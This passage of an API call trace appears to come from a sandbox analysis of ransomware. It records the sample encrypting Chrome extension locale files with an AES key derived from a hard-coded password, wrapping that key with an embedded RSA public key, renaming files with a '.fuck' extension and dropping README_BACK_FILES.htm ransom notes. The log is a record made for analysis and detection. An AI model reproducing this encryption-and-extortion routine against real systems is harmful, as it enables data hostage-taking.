lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.fuck")) returned 1 [0260.673] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.674] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.674] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.674] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.674] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.674] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0260.674] AreFileApisANSI () returned 1 [0260.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.674] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.674] GetFileType (hFile=0x5d60) returned 0x1 [0260.675] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.675] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.675] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.676] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.676] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.676] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.676] GetLastError () returned 0x0 [0260.676] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json")) returned 0x20 [0260.676] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0260.676] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.677] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.677] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.678] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.681] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.681] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.681] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.681] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.681] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.681] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.681] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e713f8) returned 1 [0260.681] CryptImportPublicKeyInfo (in: hCryptProv=0x2e713f8, dwCertEncodingType=0x1, pInfo=0x2eab470*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab4a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab4a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d840) returned 1 [0260.681] CryptEncrypt (in: hKey=0x2e7d840, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.682] CryptEncrypt (in: hKey=0x2e7d840, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70d10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70d10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.682] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e70d10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70d10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.682] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xea, lpOverlapped=0x0) returned 1 [0260.684] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xea, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.684] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.684] CloseHandle (hObject=0x5d64) returned 1 [0260.684] CloseHandle (hObject=0x5d5c) returned 1 [0260.684] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0260.687] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0260.688] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.gsg")) returned 1 [0260.689] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.fuck")) returned 1 [0260.690] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.690] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.690] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.690] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.690] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.690] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0260.690] AreFileApisANSI () returned 1 [0260.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.690] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.691] GetFileType (hFile=0x5d60) returned 0x1 [0260.691] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.692] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.692] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.692] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.692] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.692] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.692] GetLastError () returned 0x0 [0260.693] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json")) returned 0x20 [0260.693] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0260.693] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.694] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.696] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.696] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.698] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.698] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.698] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.698] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.698] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.698] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.698] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e71590) returned 1 [0260.698] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71590, dwCertEncodingType=0x1, pInfo=0x2eab540*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab570*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab578*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d880) returned 1 [0260.698] CryptEncrypt (in: hKey=0x2e7d880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.698] CryptEncrypt (in: hKey=0x2e7d880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70fb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70fb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.699] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e70fb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70fb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.699] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x127, lpOverlapped=0x0) returned 1 [0260.700] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x127, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0260.700] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0260.700] CloseHandle (hObject=0x5d5c) returned 1 [0260.700] CloseHandle (hObject=0x5d64) returned 1 [0260.701] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0260.703] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0260.704] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.gsg")) returned 1 [0260.705] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.fuck")) returned 1 [0260.706] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.706] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.706] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.706] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.706] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.706] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0260.706] AreFileApisANSI () returned 1 [0260.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.706] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.707] GetFileType (hFile=0x5d60) returned 0x1 [0260.707] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.708] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.708] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.708] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.709] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.709] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.709] GetLastError () returned 0x0 [0260.709] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json")) returned 0x20 [0260.709] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json", dwFileAttributes=0x80) 